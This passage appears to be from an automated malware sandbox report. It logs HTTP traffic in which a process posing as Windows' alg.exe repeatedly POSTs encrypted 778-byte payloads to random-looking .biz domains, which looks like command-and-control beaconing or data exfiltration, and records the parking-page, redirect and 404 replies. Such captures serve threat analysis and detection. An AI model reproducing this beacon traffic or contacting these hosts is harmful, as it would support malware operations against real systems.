                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.499385118 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:07 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=3087a78f4888064d04bb8406c53de761|8.46.123.189|1735632367|1735632367|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    22192.168.2.44981618.141.10.107807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.642390013 CET345OUTPOST /we HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: vcddkls.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.642425060 CET778OUTData Raw: 10 d6 b1 cb ee e2 df 90 fe 02 00 00 09 c2 7c 40 bd 3c 65 69 0a 5c 71 d6 b9 2c a9 c7 0d 2b 96 9d 09 97 d7 65 d7 d2 fe e4 92 51 70 01 d9 5a d2 67 8e 52 1a 02 7f 4d 82 44 08 57 a9 cd 51 33 2e 82 fb 67 79 43 77 28 ec e2 d5 c0 df c4 e8 03 c2 db 29 7f
                                                                                                                                                                                                                                    Data Ascii: |@<ei\q,+eQpZgRMDWQ3.gyCw()RN2SiAPu1"a5~^AqzW-4OJZ/0cO79Sf-(F_ yiPmIGc4b5Om/NFmRa?Yx7{
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.000380039 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:08 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=5d79a31b6d0b7f0e0a2f14e9fe501460|8.46.123.189|1735632368|1735632368|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    23192.168.2.44982772.52.178.23807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.143364906 CET342OUTPOST /m HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: fwiwk.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.143390894 CET778OUTData Raw: 7b 33 27 a5 09 75 dc 59 fe 02 00 00 b0 da d4 21 7d 4e 76 5f 6e 8c c7 65 66 2f 3f 33 69 77 a7 40 00 ed 58 e2 3e 6c 20 93 46 53 a0 f2 13 54 62 a7 08 ed d2 e9 6f 4d 8b ff ad a1 39 1e c4 25 fb a3 bd e6 2a 26 23 bc 3f 0a 6a 09 ff 3b bb 8f ea 88 64 e7
                                                                                                                                                                                                                                    Data Ascii: {3'uY!}Nv_nef/?3iw@X>l FSTboM9%*&#?j;d01Tup4}U\R8Ge_|9Icq{)QscZv!LE*d|5,GA[$Hl|`O,F*>D/b!gyIU,~hP4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.671380043 CET273INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:09 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Location: http://ww7.fwiwk.biz/m?usid=27&utid=10221880067
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.410396099 CET343OUTPOST /mt HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: fwiwk.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.410396099 CET778OUTData Raw: d5 34 93 35 7d c8 6e 1b fe 02 00 00 ea f2 76 84 99 a1 d0 22 ad 96 da 2b 81 99 91 27 dd 34 4d 60 40 4d 52 7a 25 c3 74 06 09 7b 2b 8d ff 83 fb d7 02 b3 ec 89 bd 01 64 74 26 03 65 34 47 43 c8 31 95 9c 2b c6 6e 51 04 26 c4 32 35 a2 a7 f2 09 da b0 ff
                                                                                                                                                                                                                                    Data Ascii: 45}nv"+'4M`@MRz%t{+dt&e4GC1+nQ&25O<w07?VBkx^amuSOCjdF{=WO{f;OfvQm/.Acjaz9U8 +LY6t>z}k3\J
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.556740999 CET274INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:10 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Location: http://ww7.fwiwk.biz/mt?usid=27&utid=10221880299
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    24192.168.2.449831199.59.243.227807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.797213078 CET349OUTGET /m?usid=27&utid=10221880067 HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Host: ww7.fwiwk.biz
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.276500940 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    date: Tue, 31 Dec 2024 08:06:10 GMT
                                                                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                    content-length: 1126
                                                                                                                                                                                                                                    x-request-id: 960e66a7-bb52-4fb3-ac3d-e8687c65912d
                                                                                                                                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VNFTFMvMkSJL9ZC2T3x26YYzdQKWtjzneXuzZ3ga+PtJEaP5A0Dp0Rjyg4veNFTSs0eKw07gX9hNBbt6fvTbZw==
                                                                                                                                                                                                                                    set-cookie: parking_session=960e66a7-bb52-4fb3-ac3d-e8687c65912d; expires=Tue, 31 Dec 2024 08:21:10 GMT; path=/
                                                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4e 46 54 46 4d 76 4d 6b 53 4a 4c 39 5a 43 32 54 33 78 32 36 59 59 7a 64 51 4b 57 74 6a 7a 6e 65 58 75 7a 5a 33 67 61 2b 50 74 4a 45 61 50 35 41 30 44 70 30 52 6a 79 67 34 76 65 4e 46 54 53 73 30 65 4b 77 30 37 67 58 39 68 4e 42 62 74 36 66 76 54 62 5a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VNFTFMvMkSJL9ZC2T3x26YYzdQKWtjzneXuzZ3ga+PtJEaP5A0Dp0Rjyg4veNFTSs0eKw07gX9hNBbt6fvTbZw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.276513100 CET560INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                    Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTYwZTY2YTctYmI1Mi00ZmIzLWFjM2QtZTg2ODdjNjU5MTJkIiwicGFnZV90aW1lIjoxNzM1NjMyMzcwLCJwYWdlX3VybCI6I
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.557439089 CET350OUTGET /mt?usid=27&utid=10221880299 HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Host: ww7.fwiwk.biz
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.663001060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    date: Tue, 31 Dec 2024 08:06:09 GMT
                                                                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                    content-length: 1126
                                                                                                                                                                                                                                    x-request-id: 58923a26-6cc3-48c6-8448-e22fa0f8cc90
                                                                                                                                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_myjMjjOsMgF7dNpkCvMO44aX5xVJAftG+O1Gi7Pr4e+XvWBOYKOCZ0jde2FL0d0N89fLhYn/D93ub/Ijs1ASrg==
                                                                                                                                                                                                                                    set-cookie: parking_session=58923a26-6cc3-48c6-8448-e22fa0f8cc90; expires=Tue, 31 Dec 2024 08:21:10 GMT; path=/
                                                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 79 6a 4d 6a 6a 4f 73 4d 67 46 37 64 4e 70 6b 43 76 4d 4f 34 34 61 58 35 78 56 4a 41 66 74 47 2b 4f 31 47 69 37 50 72 34 65 2b 58 76 57 42 4f 59 4b 4f 43 5a 30 6a 64 65 32 46 4c 30 64 30 4e 38 39 66 4c 68 59 6e 2f 44 39 33 75 62 2f 49 6a 73 31 41 53 72 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_myjMjjOsMgF7dNpkCvMO44aX5xVJAftG+O1Gi7Pr4e+XvWBOYKOCZ0jde2FL0d0N89fLhYn/D93ub/Ijs1ASrg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.663018942 CET560INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                    Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTg5MjNhMjYtNmNjMy00OGM2LTg0NDgtZTIyZmEwZjhjYzkwIiwicGFnZV90aW1lIjoxNzM1NjMyMzcwLCJwYWdlX3VybCI6I


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    25192.168.2.44984034.246.200.160807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.846945047 CET348OUTPOST /bilswy HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: tbjrpv.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.846945047 CET778OUTData Raw: 7f b2 20 f3 91 24 15 76 fe 02 00 00 37 ba e7 cd 27 cc 76 2f a3 b1 ae d5 a7 36 0d 49 dd 8a 22 2f 67 ea 2b 37 9a 10 5a 21 8b f0 c0 59 e3 9d 7a 01 97 1e 26 7e e1 37 91 18 06 db cc 38 b4 0a 8e 55 4d 69 18 d0 77 53 b9 9c 32 6f e4 e2 d1 ae 3f 06 c7 09
                                                                                                                                                                                                                                    Data Ascii: $v7'v/6I"/g+7Z!Yz&~78UMiwS2o?)8[>W# 8?7{|Q%jlMVG-vp-)[4bdm6H%Yyoq7rEdN9onN$]8r)}4I;t1N}JzB|


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    26192.168.2.44984134.246.200.160807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.038718939 CET345OUTPOST /nrp HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: tbjrpv.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.038765907 CET778OUTData Raw: 62 40 38 47 24 a5 49 94 fe 02 00 00 15 23 9e 8b 04 e6 04 cc b4 97 6e 5f fd 94 89 48 72 9e d9 bc 09 a7 58 8a 84 96 57 77 53 fb cd 73 52 36 35 37 07 9b 43 bf 33 29 cf fe 54 08 d7 a2 e4 25 52 a3 34 e0 e9 65 87 96 22 db 4e ef e8 52 b3 58 36 1e 05 94
                                                                                                                                                                                                                                    Data Ascii: b@8G$I#n_HrXWwSsR657C3)T%R4e"NRX6fPD<r.Kg@\GD/*eBdzE)K|p63e`IN6]oQjTv8$uo6 R:*ty%mwq"~<Dg,Dx,F
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.786493063 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:11 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=a46c3b77f3164adcefe8072c087a3a5b|8.46.123.189|1735632371|1735632371|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    27192.168.2.44984734.227.7.138807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.883486986 CET346OUTPOST /lgyfu HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: deoci.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.883498907 CET778OUTData Raw: 3d 08 04 ed c7 e4 3f 06 fe 02 00 00 87 96 23 19 65 98 c3 5a da 87 45 fd d5 1f e4 ec 5b 9e 0f 78 5c 6f 12 71 fe bc 2b 4f cf 68 9f 89 2e ec 40 8f a9 7f 12 b2 96 fd 4c 68 d0 79 55 eb 29 80 06 a6 8d 7d 43 23 74 0e da 14 f0 7f 59 4e 88 3a 7f 13 1f d1
                                                                                                                                                                                                                                    Data Ascii: =?#eZE[x\oq+Oh.@LhyU)}C#tYN:?Sza4F&#mkUD+5e37WHGf]uM(1e\_^CyHvyS!au5UyXy=X`!@2HC
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.339238882 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:12 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=00108d841e2594b73e707c30c16b6955|8.46.123.189|1735632372|1735632372|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    28192.168.2.449853208.117.43.225807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.524959087 CET351OUTPOST /mblybww HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: gytujflc.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.524979115 CET778OUTData Raw: 2f a4 e6 ea 75 41 01 06 fe 02 00 00 f0 7c 26 85 84 1b 33 bc a5 fb 67 5e 80 4f 92 7c d4 ea 35 f0 bc 51 0a 4a 9b 60 d5 c2 31 6b d1 a8 c4 88 24 a4 a6 65 e1 97 bf cd 9a 62 a8 95 75 59 ff 8e 14 1e 5e 53 42 b6 c3 67 08 c8 b0 1a 76 fd f2 7d 2c 66 2c 8b
                                                                                                                                                                                                                                    Data Ascii: /uA|&3g^O|5QJ`1k$ebuY^SBgv},f,e1e\?B|i$$XS3/s=`f#}vRebm_}~vuQ!s@`mxP<Ucl>xyoq>7NbQ%D1m@%I64X\u
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.006155968 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:12 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.077657938 CET350OUTPOST /rbdfcj HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: gytujflc.biz
